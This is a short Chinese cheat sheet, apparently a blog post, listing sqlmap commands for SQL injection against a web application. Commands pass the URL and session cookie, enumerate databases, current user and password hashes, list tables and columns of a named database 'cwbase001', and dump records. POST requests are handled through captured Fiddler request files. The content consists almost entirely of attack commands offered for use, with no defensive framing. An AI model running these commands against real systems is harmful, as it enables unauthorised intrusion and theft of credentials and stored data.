将url、cookie放到-u、cookie的参数里
sqlmap.py -u “” //查看应用服务器信息、可进行注入的漏洞类型
sqlmap.py -u “” --cookie="" --dbs --level=2 //查看应用服务器的所有实例
sqlmap.py -u “” --cookie="" --current-db --level=2 //查看当前实例
sqlmap.py -u “” --cookie="" --current-user --level=2 //查看当前用户
sqlmap.py -u “” --cookie="" --passwords --level=2 //查看当前用户的密码
sqlmap.py -u “” --cookie="" -D “cwbase001” --tables //通过上述得到权限,列举当前实例的表
sqlmap.py -u “” --cookie="" -D “cwbase001” -T “dbo.SYNC_ZWKMFZSZ2013_1__74” --columns //列举表中的字段
sqlmap.py -u “” --cookie="" -D “cwbase001” -T “dbo.SYNC_ZWKMFZSZ2013_1__74” -C “ZWKMFZSZ_DWBH” --start 1 --stop 10 --dump //暴表,对于记录数很多的情况,可以仅显示前10条
post逐步注入的命令样例:
由于post请求内容比较多,可以使用下面的办法,简化操作。将fiddler跟出的请求保存成txt,放到sqlmap安装目录下,使用下面语句进行扫描,下面输入了dbms以加快扫描的速度。
Sqlmap.py –r XXX.txt
Sqlmap.py –r XXX.txt --dbs
Sqlmap.py –r XXX.txt –D database --tables
Sqlmap.py –r XXX.txt –D database –T table --columns
Sqlmap.py –r XXX.txt - D database –T table --dump
sqlmap语句
最新推荐文章于 2024-06-17 13:37:15 发布